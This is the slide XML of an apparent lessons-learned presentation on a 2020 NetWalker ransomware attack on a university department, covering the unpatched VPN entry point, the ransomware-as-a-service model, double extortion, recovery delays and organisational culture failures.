          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An unpatched Pulse Secure VPN server – “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>the attackers intruded on the PA network via a test VPN server that was left running for two to three weeks without being patched</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once in, the hackers performed recon, elevated their privileges, disabled security controls, and began distributing ransomware across the PA department’s IT environment. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Of critical importance, the attackers compromised PA's Active Directory domain. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tthis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> domain not only contained research data, it held files containing personal identifiable information (PII), some of it from the 90s.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1377740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7630-53D1-7349-80CD-998F5EE2C84A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who was behind the attack?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCCC83DC-A6E6-864F-9E5D-7A56127ECD5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>People associated with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>NetWalker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> ransomware-as-a-service criminal organization allegedly responsible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>To prove they are serious and want to get paid attackers collect PII and share a small sample of it claiming that if the ransom is not paid they will release all of the PII.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Double extortion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Began as a ransomware crew, moved to a RaaS model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Started with phishing, moved to exposed vulnerable servers (like Pulse Secure VPN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>More on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>NetWalker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.varonis.com/blog/netwalker-ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4072087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8DFF-ABCD-244B-A2BF-58584092EF6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ransomware as a Service?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFCFCE61-BB7B-9640-AD69-BF7A6506EA25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ransomware developers lease their ransomware code, infrastructure, services to “affiliates” who attack and install the ransomware and the RaaS crew does the rest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frees the affiliate from having to develop their own ransomware, set up infrastructure, modify their tool to evade AV, in many cases even deal with the ransom negotiations/language barrier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RaaS develop takes a cut of the paid ransom for their work (20 – 50%)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The affiliate just works on compromising systems and spreading. (phishing, exposed vulnerable systems, insider threat)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="595474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EB2B-2094-B345-AA2F-DEBCF3D00E7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IR Team Assemble!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5425940A-7FC5-6447-B1FD-2449AC300758}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>IR Team quickly assembled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Compromised VPN server taken offline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Most of PA’s IT was taken offline and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>some of it is still offline and not operational over a year later!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Thus occurred when everyone was working remotely, so some challenges and benefits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Con: Not able to quickly go “pull a wire” to take a system offline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Pro: Video conferencing was easy to use.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2404993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CD3C-21D1-8647-986E-A5BB7F3C6D54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disruption to Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29A0C1AF-A662-9A4A-86F7-F5EBAC418F50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>PA’s research was disrupted for most of the summer (2020)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Recovery efforts not begun until July 1 2020</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Individual systems slowly brought back online after analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Lab support systems slowly brought back online over a 6 month period</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Took over a year to bring back their network-attached-storage (NAS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>As of June 2021 some systems/networks still isolated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3420098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C55B-104C-2245-BF38-0FD600A675DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lost Productivity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE787A5C-9EB1-FB4E-A9B9-549DB0020BC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Over a year of productivity lost for staff and faculty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>On it’s own a single research project lost a year’s worth of research data and had to start over</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Estimated that 50% to 70% of research was halted due to the attack and some of the research could not start up again for 6 months</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>In many cases, data was not recoverable, especially if a researcher had stored data on an individual system that wasn’t backed up.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3288079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4817-67C7-5346-95ED-36B40D25E7D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Data Encryption and Exfiltration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19D79649-FD67-F440-AE1D-F6B319EB3571}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>700 GB of data was encrypted by the ransomware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>8 GB of “sensitive” data was exfiltrated as part of double extortion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>~9000 PII records including images of passports, drivers licenses, bank accounts, tax records</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>1.3 million files in all, 127,000 of them containing PII</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>No evidence that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>NetWalker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> crew knew they had research data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Some indictors out there that ransomware actors are moving to just extortion since it’s faster and easier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133880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1DAC-B93F-F949-BEFA-7E6DE5E2FE3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Issues Discovered…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C599F7FF-40EF-BB4E-9488-126721B25B4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>It’s never just “if only we had patched that one server…”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>“We’re Better than You” Culture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>“Going it Alone"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>“Productivity Trumping Security”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1181141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72D90-A6F8-2246-B184-33AE0D776A0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"We’re Better than You"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71FDA720-A5D4-AE41-937D-36C98BA8C560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>PA developed an independent IT environment - its own internet access, VPNs, multiple active directories, and custom systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>PA’s IT staff predated MSU IT’s security staff.  PA believed they had more experience and knowledge in managing IT infrastructure than MSU IT for some of the past three decades.  Unfortunately this was no longer true as an aging and unsupported infrastructure showed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3068915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0B91D-BC5D-CC4A-A99D-D7155312BBCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dwell Time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09004BD2-96AB-2F49-BCDF-1D0791D01E5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>The period of time between when the attackers first get into an organization and when they are detected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Sadly often measured in weeks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>or months…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3951422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CA47-EFBD-C042-AA7E-D7CA9FEEAF82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"We’re Better than You"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A46F219-7353-2A48-84E9-247CB41361D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>This culture left PA with a false sense of security, believing they were more competent at IT and IT security than MSU IT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>PA’s IT staff were unaware of the current threat landscape and were unprepared for a ransomware attack.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3882049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9FB28-F61D-944B-91EC-82DBD5959F15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Going it Alone”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16920036-94F4-2D4C-9432-815F1B30B29B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>PA staff believed they were better at IT and wanted to “go it alone.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>IT operations within PA were governed by the Computer Operations Committee (COC), which was composed of PA faculty, who were part of the “we’re better than you” culture previously identified. And it was the COC, in the vein of “going it alone,” that shunned help from MSU IT—it was stated in the interviews that the COC actually pushed back on collaborating with and/or seeking aid from MSU IT.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
